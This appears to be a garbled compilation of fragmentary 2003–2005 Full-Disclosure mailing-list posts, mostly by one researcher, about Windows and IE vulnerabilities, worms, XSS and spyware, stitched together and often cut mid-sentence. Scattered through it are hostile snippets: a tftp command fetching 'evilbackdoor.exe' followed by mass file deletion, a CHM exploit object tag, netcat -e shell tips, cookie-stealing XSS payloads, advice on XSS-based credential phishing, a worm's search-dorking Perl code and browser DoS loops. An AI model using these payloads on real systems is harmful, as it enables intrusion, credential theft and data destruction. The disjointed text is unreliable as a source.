the NDA was with a private vendor
what they do with my info is their business
On Fri, 2005-02-18 at 14:57, morning_wood wrote:
great job...
this had been discovered by myself over a year ago,
but was only released as a internal to a project
i was under an NDA when i discovered it
cheers,
Donnie
___
Full-Disclosure - We believe in it.
Charter:
From: Gaurav Kumar [EMAIL PROTECTED]
To: full-disclosure@lists.netsys.com
Sent: Friday, February 11, 2005 1:50 AM
Subject: [Full-Disclosure] google getting attacks;anybody got this? --i got
it.
google is detecting if search contains
inurl:member.php?action=viewpromember= -- myphp forum attack.
yes... too bad he can't read...
m.w
- Original Message -
From: Polarizer [EMAIL PROTECTED]
To: full-disclosure@lists.netsys.com
Sent: Friday, February 11, 2005 3:05 AM
Subject: Re: [Full-Disclosure] google getting attacks; anybody got
this? --igot it.
This is nothing new. Was mentioned
while netdde is not started by default.
I did just notice netdde does run during
Windows update...
this would allow a window of opportunity
to exploit the service. a worm using the
netdde exploit could take advantage of
this before the user fully updates.
just noticing,
Donnie Werner
looks like MS is NOT publicly releasing a fix for this, while they have the
means and solution at hand.
( at least under IE )
a kind reader sent this little snippet...
... was able to get Microsoft to provide us with a DLL
to drop under IIS 6 to compare URL variable against the Host: header
- EXPL-A-2005-001 exploitlabs.com Advisory 030 -
- Microsoft Outlook Web Access -
OVERVIEW
A vulnerability in Microsoft Outlook Web Access allows
if you mean http://www.exploitlabs.com/urlbar.html ...
then I sent MS an advisory of this... they are working on a patch.
funny... i just noticed my first PoC of this is dated 08/27/04
( http://www.kb.cert.org/vuls/id/490708 ) is dated 2001 !!!
MS response #1
Thank you for sending this report.
scenario...
NAT client browses web...
NAT client initiates a HTTP request to do this...
ROUTER returns the request to NAT client...
( normal activity )
attacker website exploits client browser...
exploit drops and executes badfile.exe
badfile.exe hooks iexplore.exe...
badfile.exe is 'reverse
I don't have the time to investigate the cgi and dc binaries.
The cgi at least tries to daemonize and opens a TCP listening socket.
They also try to replace the index page on the vulnerable site.
cgi
1495 1495 0 /dev/tty
149E 149E 0 socket
14AA 14AA
The relevant code:
-
$procura = 'inurl:*.php?*=' . $numr;
for($n=0;$n<900;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
nothing new here...
unless... we try the L337
hhctrl.ocx is not installed by default in all SP1s but is on all SP2.
Therefore when the exploit page tries to create the object he cannot
find it so it tries to install it. On SP2 it exists by default therefore
created silently.
i replied to this because of this statement by the O.P..
Any
i think there is many like this
http://g.msn.com/0AD00014/?http://google.com
http://g.msn.com/0AD00014/?http://example.com
etc etc etc
your examples actually use an on-site URL redir
and i recall some from yahoo as well used extensively for spam
im quite sure they ( AOL ) knows about this , and is
even Microsoft publishes PoC for browser DoS ( multi platform too )
see:
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp
-- / snip / --
var big_string = "double me up!";
while (true)
{
big_string = big_string + big_string; // 20
quite common, funny because xss can be used in PHISHING attacks.
instead of alert blah try some html redirects to a hosted site with a fake
login
spoofing the original content ( a login page ) and capture username/password
then pass them to the real login page.
or better yet... xss dos attacks,
Below are some examples of what an actual Santy search request would
look like:
http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=allinurl%3A+%22viewtopic.php%22+%22topic%3D27516%22&btnG=Search
If their refusal to release that mail even after their customer is dead is
an indication as to their privacy practices, three cheers for Yahoo.
Don't you get the whole slippery slope thing? If it's ok when you're
dead (which it's not, my stuff is my stuff...destroy it when you're sure
I've
I can confirm on WinXP SP1 ( download the [patch].exe run and reboot)
Mr Wever's exploit PoC did not run ( no shell, dialog warning )
cheers,
m.w
The IFRAME vulnerability has been patched, see
http://www.microsoft.com/technet/security/bulletin/ms04-040.mspx
The wording in ms04-040 is so
http://sourceforge.net/projects/showtraf
showtraf.
i use this everyday, its free, easy, simple, and small ( 1 file ).
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
.. molded cdroms..
( i assume you mean pressed cdroms like MsWindows or Doom3 that you buy)
do you even know how they are made?!?
.. you can't burn more data on a molded cdrom, as the
reflective layer is not only not burnable, but never was burnt to begin
with.
but thanks for playing!!!
maybe a
then there was this little diddy...
HYDERABAD: The hacker is on the prowl and the government can do little to
stop him in his tracks. At least, that's what the IT department - custodian
of the government web sites and servers ...
http://timesofindia.indiatimes.com/articleshow/320561.cms
cheers,
oh?
-
08/23/2001 05:00 AM 354,468 wmpaud1.wav
( bintext output )
00056862 00056862 0 INFOICRD
0005686E 0005686E 0 2000-04-06
00056882 00056882 0 Deepz0ne
00056894 00056894 0 Sound Forge 4.5
-
..heh
Guys,
For your pleasure:
file is a MSVB exe, here are some fun strings from the binary...
( spyware, but not a trojan )
http://www.maxmind.com:8010/a?l=PeAyF1sgrZYwi=\tempf.txt
\usta32.ini
http://mmm.media-motor.net/bundle.php?aff=\affbun.txt
phases
sewers
outers
c:\asdf.txt
randomdll
mydll
randomocx
\regsvr32 /s
bindshell success ( html run from local )
connect from remote success...
this is NASTY
if shellcode modified this will do reverse or exe drop i assume
good work,
Donnie Werner
Obviously not many of you Americans ( which I am )
travel to Europe much do you.
You fail to see, and therefore cannot comprehend the attitude of many
Europeans
about the attitudes of the American government ( f*cking with other parts of
the
world ) for peace and freedom when it is about
there is a [x] box..
Don't ask for my password for 2 weeks.
this sets the users cookie. Gmail uses the cookie for authentication.
XSS holes are not (as we all know) an immediate bypass for
any authentication.
right
It can be used, with a bit of work, to steal
cookies/authentication data
phood 4 th0ugh7,
last i heard being on the internet was voluntary...
( whether you are a person or business entity
and many successful business have no internet presence )
if i am correct... being on the internet is not mandatory to
conduct life sustaining activities...
( eat, shit, sleep [
a malicious user who has already gained a command shell to activate
umm... you already own the box.
try...
tftp -i yourhost get evilbackdoor.exe ( vnc mabey )
or
c:\del *.exe /s
c:\shutdown -r
I really do not see the SECURITY ISSUE here.
cheers,
m.wood
umm, no
all this has that's different is correct headers for bind or remote shell
option.
and ability to set ports and return ip in the code, instead of needing to
use your own shellcode ( or metasploits ) note: there is no new exploit code
or vector
--- / snip /-
Ron, PLEASE STFU KTHNX ( you too Larry S. )
Who the f*ck cares, they hired him, if you don't like the company, don't
patronize them for business.
But please shutthefuckup. Why?
1. You have nothing to contribute.
2. you bitch and moan about things that are truly insignificant.
3. you are a Media
reverse successful...
m.wood
Game over...
So the exploit is out that will open a local command prompt on the
machine exploiting the GDI library..
This thing allows 2500 bytes of shellcode..
How long before this turns nasty?
Seems easy to me to make it reverse shell...
guess they shouldn't have publicized it. ( who cares )
@stake / Symantec - business is business, Symantec is acquiring not only
tools and expertise,
but possibly more importantly a broader, richer client base. ( again, who
cares )
I do however find this interesting... the below suggests that a
password issues known to exist..
http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&safe=off&q=axis+camera+exploit
http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&safe=off&q=axis+camera+vulnerability
or...
http://www2.corest.com/common/showdoc.php?idx=329&idxseccion=10
object data=http://www.v%69k%6F%72d.com/default.htm;brbr
this is a data tag .chm exploit
[textarea id=code style=display:none;]
[object
data=#109;s-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::
/default.htm type=text/x-scriptlet][/object]
[/textarea]
[script
password issues known to exist..
http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&safe=off&q=axis+camera+exploit
http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&safe=off&q=axis+camera+vulnerability
or...
http://www2.corest.com/common/showdoc.php?idx=329&idxseccion=10
you're serious??
this issue has been around for about 10 years...
try googling ws_ftp.ini where you can simply drop the
ini in your ws_ftp folder, convert the hashes or import into your
favorite ftp client that supports ws_ftp.ini style format.
m.wood
- Original Message -
From: Gaurang
wgte frauder.us/linux/ssh.tgz
http://frauder.us serves up putty.exe ( v 0.54 ) on connect
as frauder, no extension. Proally not your average admin
tool setup...
m.wood
i am curious if a regedit setting exists in order to alter the user agent of
the browser
and to conceal info.
under windows...
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\User Agent\Post Platform
use anything... ( including javascript [hinthint] )
m.wood
it seems to just be loading a bunch of data ( 1851MB ) via images
to consume memory.
the same effect can be accomplished here...
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp
-- snip --
Such memory protection systems
Since that time I have seen sensationalist TV shows showing how FBI and
CIA
operatives get stuff out written to a sector BEFORE the sector was
overwritten and I honestly cannot understand how that could be, if at all
possible. Am I right in thinking those shows are bull?
simple...
by
http://exploit.wox.org/babelpr0x.html
try babelfish?
m.wood
http://exploit.wox.org/tools/googleproxy.html
But with that (it is only the google translator), you aren't anonymous,
because the images and other files aren't translated, and they are loaded
directly from the server.
rofl, are you sure you're not Bipin ?
Subject: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability
in all web servers.
File Source disclosure vulnerability in all web servers.
Remote exploitation of this issue can be achieved by clicking with the
right button into the website
- EXPL-A-2004-002 exploitlabs.com Advisory 028 -
- Surgemail -
OVERVIEW
SurgeMail is a next generation Mail Server -
Combining
http://www.f-secure.com/v-descs/wallon.shtml
Last week on the site of 'The Register' an article was published about
spam-mail that used an unknown 'zero-day' vulnerability in IE. They did not
release any information about the zero-day issue, so perhaps anyone on the
list knows anything
I have the following queries
1. Would an exploit like this be said to be severe?
yes
2. Is the vendor right in their approach to this issue?
not entirely
3. How do I make public the vulnerability? (Vendor has given permission for
the same)
post it here, on your site, or another security
Zone-h.org reports..
A Portuguese group dubbed Outlaw group has defaced the Microsoft.com web
site, the hacked page (www.microsoft.com/mspress/uk/) isn't available anymore
since 9:00pm GMT
read more...
http://zone-h.org/en/news/read/id=4251/
m.wood
: Thursday, May 20, 2004 12:44 PM
To: morning_wood; 0day; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow
in ActivePerl ?
I haven't tested it yet but this also probably means that the msi/Microsoft
service compiler in the Activeperl Developer's Kit
binaries created via perl2exe also are affected.
C:\type 1.pl
#
$a=A x 256; system($a);
C:\perl2exe -v 1.pl
Perl2Exe V7.02 Copyright (c) 1997-2003 IndigoSTAR Software
Cmd = -v 1.pl
CWD = C:\
Known platforms: Win32
Target platform = Win32 5.006001
$I =
$ENV{'PERL5LIB'} =
Found perl.exe at
and we seem to get control of EIP. Coincidence? Try yet two more:
C:\perl -e $a=A x 261; system($a)
C:\perl -V
Characteristics of this binary (from libperl):
Compile-time options: MULTIPLICITY USE_ITHREADS PERL_IMPLICIT_
LICIT_SYS
Locally applied patches:
ActivePerl Build 635
Can anybody reproduce this?
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\perl -e $a=A x 256; system($a)
'AAA
Sasser violates poorly designed/implemented network infrastructures.
kinda like breaking into a room via a locked door, through a window in
said locked door. The door design does not implement a proper design
infrastructure for the intended application.
Jail the mfg of the Door?? i think not.
that sure got their attention! just keep this up but after informing the isp
that if they cannot protect your network then you would have to take active
steps to protect your network which includes all the network scanning and
namapping etc
since when is it the ISP's job to protect your network
sneaker
possibly a beta version of a connect back trojan.
seems to be able to use a website to transfer information between the
attacker and the infected machine.
appredir-username=some_irc_guy
client version=sneaker_0.19
http://vil.mcafee.com/alphar.asp?char=SCRIPTalert(document.cookie);/SCRIPTS
CRIPTalert(document.cookie);/SCRIPT
D.Werner
http://nothackers.org
Tamas Feher wrote...
1., First Amendment defines free speech. Source code has been proven
free speech. Executables are not covered by free speech
this statement is illogical.
what exactly makes string of characters executable ?
MZ? elf? contained in the first few bytes / bits?
please define
Hi morning wood. Aren't you the guy who ran a vulnerable demo version
of some windows ircd for your security team? Oh no maybe someday
you might be important enough to be Rosiello Jr Security Analyst.
no, i ran a personal IRCD that was attacked by the precursor of msblaster
(
) tal!x [EMAIL PROTECTED]'Q_ IP addrvs3
-- snip ---
based on the above, the worm / viri tries to connect to a IRC server.
anyone else experiencing this?
morning_wood
http://exploitlabs.com
Unrelated but funny stories of rave (Jonny Mast) getting owned:
- rave gets his account backdoored on kokanin's box. He finds the obviously
Apr 24 13:25:18 rave KOKANIN UR BOX IS FUKCING HACKED AND ALL MY
STUFF IS GONE!
rofl, DTORS owned again.
hi there
From: [EMAIL PROTECTED]
ahh nevermind, it's clear neither of you have the
desire to learn
maybe they need this...
- snip -
#!/usr/bin/perl
#
# the perl of security ( gettn' a clue )
# by m.wood
#
# version 1.03
#
use CommonSense; # you do have this module...
Another question: Is there a quick way to find out which tool compressed
an executable? A tool maybe?
PEiD
http://peid.has.it/
m.wood
http://exploitlabs.com
Browser bugs [DoS] ... where will you draw a line?
DoS bugs that cause permanent damage are treated differently, of course.
For example, I could imagine a bug that would corrupt some critical file
what about Browser bugs[DoS] a XSS vulnerable site?
simple javascript leveraged against a host
executing this at the dos prompt would create a zero byte m.wood file
m.wood
looks like a feature equivalent to touch m.wood or touch filename
LMFAO
m.wood
[EMAIL PROTECTED]:~$ more testfile.txt
Let's try this in Linux
[EMAIL PROTECTED]:~$ ls -al testfile.txt
- -rw-r--r--1 chrisusers 24 Apr 7 12:43 testfile.txt
[EMAIL PROTECTED]:~$ testfile.txttestfile.txt
- -bash: ./testfile.txt: Permission denied
[EMAIL PROTECTED]:~$ more
You can also delete files by using the del command. I tested this with the
5.1 ntos kernel (Slackware XP):
C:\del testfile.exe
if you were trying to be sarcastic in saying this is
normal, any dummy knows that then you failed
horrendously, sir.
where did the delete command come from
Fat32 file output redirect overwrites self.
===
odd behavior... ?
1.) console application output redirected to itself ( file.ext file.ext )
C:\testprogram.exe program.exe
program.exe
The process cannot access the file because it is being used by another process.
ok
Oh contraire, the first thing we do when we go onsite to work on windows box
is ask my client to reboot it first, particularly if it is a server, as
occasionally they do not come back up, and we do not want to be blamed
just because the OS is unstable
and you claim to be a security
k-rad this is old... mmmk
possibly someone not from bbs days may not remember..
i got offline between 93-95
We present to you the second installment of our introductionary series
into the exciting world of Mostly Harmless Hacking. Hacking from Windows 95.
Copyright 1997
( recycling old zine's
well... i got mine, but funny thing..
<p><strong>This CD requires that JavaScript be enabled for your Web
browser.</strong> </p>
<p>If you need help re-enabling JavaScript for your browser, <a
href="http://go.microsoft.com/fwlink/?linkid=9580" target="_blank">click
here</a>.</p>
then offers this screen...
You
Is it possible to erase data on a hard disk drive
with a powerful magnet, but then be able to use the drive and the PC again?
yes
m.wood
or worm or anything
else i didn't want. and i do not run any AV nor filtering
nor firewall to this box.
am i missing something here?
because i really do not see the issue.
morning_wood
http://exploitlabs.com
every one is blabbling about some new mirc 6.14 dcc exploit. Is this true?
has any body confirmed this?
http://searchirc.com/boards/viewtopic.php?t=1115
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=mirc+6.14+exploit&btnG=Google+Search
i like Google©
m.wood
I'd like to suggest everybody starts sending an annoying mail back to the
poster of useless crap like this AND NOT TO THE LIST.
I try to make a habit of sending n00b mail to the AV notices i receive
as someone on this list has / does get infected, my address gets spoofed,
and mr.N00bular with
However, in this case, *I* sent the virus. I had the word t e x t . p i
f in the body of my message (without the spaces, of course), and the
poorly configured AV scanners detected a virus.
about as funny as this
( http://lists.netsys.com/pipermail/full-disclosure/2003-May/005244.html )
Hi,
How bad is it to have Win XP HOME at work - in LAN ?
I ask for security reasons - I just logged off in winxp home from
vncviewer and it said -closing all network connections ...- and my vnc
connection still remained active :)?
sometimes winXP's tcp parameters keep a connection open
buddyiframe src=http://www.malware.com/pithy.html;
so could this url be considered a phishing scam ?
regardless of your implied intent? It does pretend
to be a genuine login, and i am sure you are collecting successful
attempts to a log ( right? ). Has your demo overstepped the bounds
of
Gimme a break..
http://go.microsoft.com/?LinkID=422101
although this could be amusing...
http://www.microsoft.com/security/protect/cd/order.asp
m.wood
How can i know if there a sniffer running in my network?
When you wake up one day to find that you're 0wn3d :-)
Seriously, about the only way I can think of to detect a sniffer with
its transmit leads cut is with a Time Domain Reflectometer (TDR) and
look for an unexplained impedance
basically looking for sync-src-1.00.tbz. That message was posted to this
avail on infected hosts
This is how I came to be in possession of it:
nc -l -p 3127 > doomjuice.dump
You will probably want to write a
loop to restart netcat because it exits after a successful transfer.
Now I'm confused...
[EMAIL PROTECTED] /storage/virii] $ nc -h
GNU netcat 0.7.1, a rewrite of the famous networking tool.
Basic usages:
connect to somewhere: nc [options] hostname port [port] ...
listen for inbound:nc -l -p port [options] [hostname] [port] ...
tunnel to somewhere:
I heard that it was possible to cause irreparable
damage to any electronic circuit through
certain waves or radio emissions ( I'm not qualified
in this subject ).
ESD
Google is my friend..
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=esd
make him yours.
D.Werner
Many of these systems come from the vendor with default shares enabled
allowing anonymous access, no patches, default passwords, no anti-virus,
etc. Many health-care organizations then proceed to plug them into the
general network and pretend that nothing's wrong.
ahem... this is not a
NOW EVERY EXECUTABLE IS TRUSTED AND DIGITALLY SIGNED
found this interesting...
\win2k\private\inet\mshtml\build\scripts\tools\x86
iexpress.exe
signcode.exe
makecert.exe ( DigSig.dll )
( in fast food voice ) and who would you like your package to be certified
from today sir?
IE6 is not vulnerable, so I guess I'll get back to work. My Warhol
worm will have to wait a bit...
Dunno but your message crashes OE on (pre)view.
no warning, no nothin... OE just *bink* closes
NICE JOB [EMAIL PROTECTED]
guess those sources are good for something huh
( , ubber
please enlighten us on your versions numbers / patch levels wood.
-KF
morning_wood wrote:
Dunno but your message crashes OE on (pre)view.
no warning, no nothin... OE just *bink* closes
NICE JOB [EMAIL PROTECTED]
Symptoms were reported using the following:
Windows XP Pro ( Gold
win2k sp4
does not work
Help Center only ships with Me, XP and Win2k3
btw.. UNCONFIRMED in Xp Pro Sp0
m.wood
it has been leaked , also for the winnt 4 and the windows XP sourcecode
files like : windows.2000.source.code-IND are now roaming irc channels and
webpages ... it is a hard day for microsoft i guess
I have seen these files... personally I find it hard to believe the NT / 2k base
is bigger that
-To: moderator for [EMAIL PROTECTED]
Received: (qmail 14774 invoked from network); 10 Feb 2004 22:07:52 -
X-Originating-IP: [4.65.224.219]
X-Originating-Email: [EMAIL PROTECTED]
X-Sender: [EMAIL PROTECTED]
From: morning_wood [EMAIL PROTECTED]
To: [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED
enbiei.exe
.. yes there are 4 variants.
to get infected ( capture one ) try netcat with the -e
to call cmd.com listening on port as well... fun trick.
morning_wood
http://exploitlabs.com
feb - 2006 ???
feb - 2005 ???
http://lists.netsys.com/pipermail/full-disclosure/
sorted by date.
The Full-Disclosure Archives
You can get more information about this list or you can download the full raw
archive ( 92 MB ).
ArchiveView by:Downloadable version
2006-February:[ Thread ] [ Subject ]
been applied. We have scanned with Retina, Foundstone and Qualys tools
which they all showed as VULNERABLE, however when we scanned with Microsoft
Base Security Analyzer it showed as NOT VULNERABLE. This was at first
confusing; one would think an assessment tool released by the original
did
I noticed that the file was last modified a day that i didn't open my pc. Is
there any change for that file to have attributes than the real one?
not uncommon for date manipulation with trojans. Beast 2.05 uses activeX
startup routines and file date manipulation of the files ( files are dated
dunno if this is new but..
http://pa.yahoo.com/*http://rd.yahoo.com/hotjbs/*http://example.com
m.wood
http://www.startribune.com/stories/535/4304797.html
in re-reading this article i was presented with
an offer to subscribe/signup/register to the StarTribune
when re-clicking on the above link. The redirected url is
The FBI and other police agencies may not eavesdrop on conversations inside
automobiles equipped with OnStar or similar dashboard computing systems...
http://news.com.com/2100-1029_3-5109435.html
uhhh...
Big brother is now
m. wood
http://exploitlabs.com
even under
low security settings. try again Jelmer?
morning_wood
http://exploitlabs.com
Your post isn't very informative
what kind of system did you test it on? It worked on my fully patched
windows XP
WinXp Sp0 IE6 010817-1148
running http://microsoft.bbs.us/malware.html i get only a webpage with
junkware
and no file(s) on my hd.
running malware.html locally does produce
Actually winMe is quite safe out of the box ( its win9x ) and
does not have the remote compromises that affect winXP / win2k
Donnie Werner
E2 Labs
- Original Message -
From: j [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Monday, November 10, 2003 6:33 AM
Subject: [Full-Disclosure]
Buddy (but mr
technician... he talks to me) for crying out loud
Donnie Werner
[EMAIL PROTECTED]
- Original Message -
From: [EMAIL PROTECTED]
To: morning_wood [EMAIL PROTECTED]
Cc: j [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Monday, November 10, 2003 8:44 AM
Subject: Re: [Full
ever try google?
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=eeye+object&btnG=Google+Search
morning_wood
- Original Message -
From: Ahmad Naazir [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Wednesday, November 05, 2003 2:06 PM
Subject: [Full-Disclosure] IE object vulnerability
it is a demo of the object tag exploit code, asp is server side script that
does not render in the browser, that is why you can't see it.
morning_wood
- Original Message -
From: Ahmad Naazir [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, November 04, 2003 3:09 PM
Subject: [Full